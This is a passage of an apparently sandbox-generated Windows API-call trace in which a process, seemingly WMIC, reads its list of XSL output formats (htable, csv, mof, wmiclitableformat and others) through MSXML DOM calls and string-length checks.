SysStringLen (param_1="RAWXML") returned 0x6 [0285.390] malloc (_Size=0x18) returned 0x2da2b50 [0285.390] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.390] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.390] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.390] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=4, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.390] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="htable.xsl") returned 0x0 [0285.390] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.390] malloc (_Size=0xc) returned 0x2da98c8 [0285.390] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.391] free (_Block=0x2da98c8) [0285.391] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0285.391] malloc (_Size=0xc) returned 0x2da9838 [0285.391] malloc (_Size=0xc) returned 0x2da9868 [0285.391] SysStringLen (param_1="HTABLE") returned 0x6 [0285.391] SysStringLen (param_1="TABLE") returned 0x5 [0285.391] SysStringLen (param_1="HTABLE") returned 0x6 [0285.391] SysStringLen (param_1="LIST") returned 0x4 [0285.391] malloc (_Size=0x18) returned 0x2da2bd0 [0285.391] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.391] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.391] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.391] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=5, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.391] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="hform.xsl") returned 0x0 [0285.391] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.392] malloc (_Size=0xc) returned 0x2da9910 [0285.392] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.392] free (_Block=0x2da9910) [0285.392] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0285.392] malloc (_Size=0xc) returned 0x2da98c8 [0285.392] malloc (_Size=0xc) returned 0x2da98e0 [0285.392] SysStringLen (param_1="HFORM") returned 0x5 [0285.392] SysStringLen (param_1="TABLE") returned 0x5 [0285.392] SysStringLen (param_1="HFORM") returned 0x5 [0285.392] SysStringLen (param_1="LIST") returned 0x4 [0285.392] SysStringLen (param_1="HFORM") returned 0x5 [0285.392] SysStringLen (param_1="HTABLE") returned 0x6 [0285.392] malloc (_Size=0x18) returned 0x2da2c10 [0285.392] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.392] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.392] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.393] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=6, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.393] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="xml.xsl") returned 0x0 [0285.393] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.393] malloc (_Size=0xc) returned 0x2da9910 [0285.393] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.393] free (_Block=0x2da9910) [0285.393] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0285.393] malloc (_Size=0xc) returned 0x2da9910 [0285.393] malloc (_Size=0xc) returned 0x2da97f0 [0285.393] SysStringLen (param_1="XML") returned 0x3 [0285.393] SysStringLen (param_1="TABLE") returned 0x5 [0285.393] SysStringLen (param_1="XML") returned 0x3 [0285.393] SysStringLen (param_1="VALUE") returned 0x5 [0285.393] SysStringLen (param_1="VALUE") returned 0x5 [0285.393] SysStringLen (param_1="XML") returned 0x3 [0285.393] malloc (_Size=0x18) returned 0x2da2ab0 [0285.394] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.394] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.394] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.394] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=7, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.394] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="mof.xsl") returned 0x0 [0285.394] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.394] malloc (_Size=0xc) returned 0x2da9940 [0285.394] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.394] free (_Block=0x2da9940) [0285.394] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0285.394] malloc (_Size=0xc) returned 0x2da9940 [0285.394] malloc (_Size=0xc) returned 0x2da9970 [0285.394] SysStringLen (param_1="MOF") returned 0x3 [0285.395] SysStringLen (param_1="TABLE") returned 0x5 [0285.395] SysStringLen (param_1="MOF") returned 0x3 [0285.395] SysStringLen (param_1="LIST") returned 0x4 [0285.395] SysStringLen (param_1="MOF") returned 0x3 [0285.395] SysStringLen (param_1="RAWXML") returned 0x6 [0285.395] SysStringLen (param_1="LIST") returned 0x4 [0285.395] SysStringLen (param_1="MOF") returned 0x3 [0285.395] malloc (_Size=0x18) returned 0x2da2a70 [0285.395] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.395] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.395] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.395] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=8, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.395] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="csv.xsl") returned 0x0 [0285.395] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.395] malloc (_Size=0xc) returned 0x2da9820 [0285.395] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.396] free (_Block=0x2da9820) [0285.396] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0285.396] malloc (_Size=0xc) returned 0x2da9820 [0285.396] malloc (_Size=0xc) returned 0x2da9958 [0285.396] SysStringLen (param_1="CSV") returned 0x3 [0285.396] SysStringLen (param_1="TABLE") returned 0x5 [0285.396] SysStringLen (param_1="CSV") returned 0x3 [0285.396] SysStringLen (param_1="LIST") returned 0x4 [0285.396] SysStringLen (param_1="CSV") returned 0x3 [0285.396] SysStringLen (param_1="HTABLE") returned 0x6 [0285.396] SysStringLen (param_1="CSV") returned 0x3 [0285.396] SysStringLen (param_1="HFORM") returned 0x5 [0285.396] malloc (_Size=0x18) returned 0x2da2d10 [0285.396] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.396] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.396] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.396] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=9, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.396] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="texttable.xsl") returned 0x0 [0285.397] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.397] malloc (_Size=0xc) returned 0x2da9988 [0285.397] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.397] free (_Block=0x2da9988) [0285.397] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0285.397] malloc (_Size=0xc) returned 0x2da9988 [0285.397] malloc (_Size=0xc) returned 0x2daabd0 [0285.397] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.397] SysStringLen (param_1="TABLE") returned 0x5 [0285.397] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.397] SysStringLen (param_1="VALUE") returned 0x5 [0285.397] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.397] SysStringLen (param_1="XML") returned 0x3 [0285.397] SysStringLen (param_1="XML") returned 0x3 [0285.397] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.397] malloc (_Size=0x18) returned 0x2da2a50 [0285.397] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.398] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.398] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.398] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=10, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.398] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="texttable.xsl") returned 0x0 [0285.398] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.398] malloc (_Size=0xc) returned 0x2daac18 [0285.398] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.398] free (_Block=0x2daac18) [0285.398] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0285.398] malloc (_Size=0xc) returned 0x2daadf8 [0285.398] malloc (_Size=0xc) returned 0x2daac30 [0285.398] SysStringLen (param_1="texttablewsys") returned 0xd [0285.398] SysStringLen (param_1="TABLE") returned 0x5 [0285.398] SysStringLen (param_1="texttablewsys") returned 0xd [0285.398] SysStringLen (param_1="XML") returned 0x3 [0285.399] SysStringLen (param_1="texttablewsys") returned 0xd [0285.399] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.399] SysStringLen (param_1="XML") returned 0x3 [0285.399] SysStringLen (param_1="texttablewsys") returned 0xd [0285.399] malloc (_Size=0x18) returned 0x2da2cd0 [0285.399] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.399] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.399] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.399] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=11, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.399] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="texttable.xsl") returned 0x0 [0285.399] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.399] malloc (_Size=0xc) returned 0x2daade0 [0285.399] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.399] free (_Block=0x2daade0) [0285.400] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0285.400] malloc (_Size=0xc) returned 0x2daaca8 [0285.400] malloc (_Size=0xc) returned 0x2daac00 [0285.400] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.400] SysStringLen (param_1="TABLE") returned 0x5 [0285.400] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.400] SysStringLen (param_1="XML") returned 0x3 [0285.400] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.400] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.400] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.400] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.400] malloc (_Size=0x18) returned 0x2da2b90 [0285.400] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.400] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.400] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.400] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=12, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.400] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="texttable.xsl") returned 0x0 [0285.400] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.401] malloc (_Size=0xc) returned 0x2daad38 [0285.401] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.401] free (_Block=0x2daad38) [0285.401] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0285.401] malloc (_Size=0xc) returned 0x2daaba0 [0285.402] malloc (_Size=0xc) returned 0x2daab10 [0285.402] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0285.402] SysStringLen (param_1="TABLE") returned 0x5 [0285.402] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0285.402] SysStringLen (param_1="XML") returned 0x3 [0285.402] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0285.402] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.402] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0285.402] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.402] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.402] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0285.402] malloc (_Size=0x18) returned 0x2da2d30 [0285.402] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.402] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.402] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.403] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=13, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.403] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="texttable.xsl") returned 0x0 [0285.403] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.403] malloc (_Size=0xc) returned 0x2daade0 [0285.403] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.403] free (_Block=0x2daade0) [0285.403] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0285.403] malloc (_Size=0xc) returned 0x2daabb8 [0285.403] malloc (_Size=0xc) returned 0x2daabe8 [0285.403] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0285.403] SysStringLen (param_1="TABLE") returned 0x5 [0285.403] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0285.403] SysStringLen (param_1="XML") returned 0x3 [0285.403] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0285.404] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.404] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0285.404] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.404] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.404] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0285.404] malloc (_Size=0x18) returned 0x2da29b0 [0285.404] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.404] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.404] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.404] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=14, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.404] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="texttable.xsl") returned 0x0 [0285.404] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.404] malloc (_Size=0xc) returned 0x2daab28 [0285.404] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.404] free (_Block=0x2daab28) [0285.405] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0285.405] malloc (_Size=0xc) returned 0x2daac18 [0285.405] malloc (_Size=0xc) returned 0x2daadc8 [0285.405] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0285.405] SysStringLen (param_1="TABLE") returned 0x5 [0285.405] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0285.405] SysStringLen (param_1="XML") returned 0x3 [0285.405] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0285.405] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.405] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0285.405] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.405] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0285.405] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0285.405] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.405] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0285.405] malloc (_Size=0x18) returned 0x2da2c30 [0285.405] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.405] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.405] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.405] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=15, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.406] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="htable.xsl") returned 0x0 [0285.406] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.406] malloc (_Size=0xc) returned 0x2daac48 [0285.406] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.406] free (_Block=0x2daac48) [0285.406] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0285.406] malloc (_Size=0xc) returned 0x2daad20 [0285.406] malloc (_Size=0xc) returned 0x2daac48 [0285.406] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0285.406] SysStringLen (param_1="TABLE") returned 0x5 [0285.406] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0285.406] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.406] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0285.406] SysStringLen (param_1="XML") returned 0x3 [0285.406] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0285.406] SysStringLen (param_1="texttablewsys") returned 0xd [0285.406] SysStringLen (param_1="XML") returned 0x3 [0285.406] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0285.406] malloc (_Size=0x18) returned 0x2da2990 [0285.407] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.407] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.407] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.407] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=16, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.407] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="htable.xsl") returned 0x0 [0285.407] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.407] malloc (_Size=0xc) returned 0x2daad50 [0285.407] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.407] free (_Block=0x2daad50) [0285.407] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0285.407] malloc (_Size=0xc) returned 0x2daad98 [0285.407] malloc (_Size=0xc) returned 0x2daac60 [0285.407] SysStringLen (param_1="htable-sortby") returned 0xd [0285.408] SysStringLen (param_1="TABLE") returned 0x5 [0285.408] SysStringLen (param_1="htable-sortby") returned 0xd [0285.408] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.408] SysStringLen (param_1="htable-sortby") returned 0xd [0285.408] SysStringLen (param_1="XML") returned 0x3 [0285.408] SysStringLen (param_1="htable-sortby") returned 0xd [0285.408] SysStringLen (param_1="texttablewsys") returned 0xd [0285.408] SysStringLen (param_1="htable-sortby") returned 0xd [0285.408] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0285.408] SysStringLen (param_1="XML") returned 0x3 [0285.408] SysStringLen (param_1="htable-sortby") returned 0xd [0285.408] malloc (_Size=0x18) returned 0x2da2c70 [0285.408] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.408] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.408] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.408] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=17, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.408] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="mof.xsl") returned 0x0 [0285.408] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.408] malloc (_Size=0xc) returned 0x2daad38 [0285.409] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.409] free (_Block=0x2daad38) [0285.409] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0285.409] malloc (_Size=0xc) returned 0x2daacf0 [0285.409] malloc (_Size=0xc) returned 0x2daab70 [0285.409] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0285.409] SysStringLen (param_1="TABLE") returned 0x5 [0285.409] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0285.409] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.409] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0285.409] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.409] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0285.409] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0285.409] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.409] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0285.409] malloc (_Size=0x18) returned 0x2da2cb0 [0285.409] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.409] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.409] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.409] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=18, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.410] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="mof.xsl") returned 0x0 [0285.410] IXMLDOMNode:get_attributes (in: This=0x2cd6b88, attributeMap=0x87fbe4 | out: attributeMap=0x87fbe4*=0x2cd9fa8) returned 0x0 [0285.410] malloc (_Size=0xc) returned 0x2daab28 [0285.410] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2cd9fa8, name="KEYWORD", namedItem=0x87fbe0 | out: namedItem=0x87fbe0*=0x2cd9ff8) returned 0x0 [0285.410] free (_Block=0x2daab28) [0285.410] IXMLDOMNode:get_nodeValue (in: This=0x2cd9ff8, value=0x87fba0 | out: value=0x87fba0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0285.410] malloc (_Size=0xc) returned 0x2daad38 [0285.410] malloc (_Size=0xc) returned 0x2daab40 [0285.410] SysStringLen (param_1="wmiclimofformat") returned 0xf [0285.410] SysStringLen (param_1="TABLE") returned 0x5 [0285.410] SysStringLen (param_1="wmiclimofformat") returned 0xf [0285.410] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.410] SysStringLen (param_1="wmiclimofformat") returned 0xf [0285.410] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0285.410] SysStringLen (param_1="wmiclimofformat") returned 0xf [0285.410] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0285.410] SysStringLen (param_1="wmiclimofformat") returned 0xf [0285.410] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0285.411] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0285.411] SysStringLen (param_1="wmiclimofformat") returned 0xf [0285.411] malloc (_Size=0x18) returned 0x2da2af0 [0285.411] IUnknown:Release (This=0x2cd6b88) returned 0x0 [0285.411] IUnknown:Release (This=0x2cd9fa8) returned 0x0 [0285.411] IUnknown:Release (This=0x2cd9ff8) returned 0x0 [0285.411] IXMLDOMNodeList:get_item (in: This=0x2cd9ca0, index=19, listItem=0x87fbe8 | out: listItem=0x87fbe8*=0x2cd6b88) returned 0x0 [0285.411] IXMLDOMNode:get_text (in: This=0x2cd6b88, text=0x87fbec | out: text=0x87fbec*="textvaluelist.xsl") returned 0x0 